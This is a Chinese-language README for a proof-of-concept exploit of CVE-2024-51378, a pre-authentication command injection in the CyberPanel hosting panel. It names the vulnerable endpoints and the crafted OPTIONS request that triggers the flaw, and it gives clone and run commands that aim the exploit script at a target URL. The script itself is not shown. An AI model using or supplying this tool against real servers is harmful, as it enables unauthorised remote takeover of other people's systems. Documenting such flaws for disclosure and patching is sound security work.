针对 CyberPanel 预认证 RCE(远程代码执行)的命令注入漏洞利用
作者: Luka Petrovic (refr4g)
披露日期: 2024 年 10 月
针对 CyberPanel 中命令注入漏洞(CVE-2024-51378)的概念验证(PoC)利用代码。该漏洞允许未认证的攻击者通过向 /dns/getresetstatus 和 /ftp/getresetstatus 端点发送精心构造的 OPTIONS HTTP 请求,在易受攻击的服务器上注入并执行任意命令,可能导致系统完全沦陷。
能够通过网络访问 CyberPanel 界面的攻击者可以利用此漏洞完全控制受影响的系统。
git clone https://github.com/refr4g/CVE-2024-51378.git
cd CVE-2024-51378
python3 CVE-2024-51378.py <target_url> <endpoint>
target_url:CyberPanel 实例的 URL(例如,http://target.com:8090)。endpoint:易受攻击的端点(/ftp/getresetstatus 或 /dns/getresetstatus)。python3 CVE-2024-51378.py http://target.com:8090 /ftp/getresetstatus
此代码仅用于教育目的,只能用于你拥有明确测试许可的系统。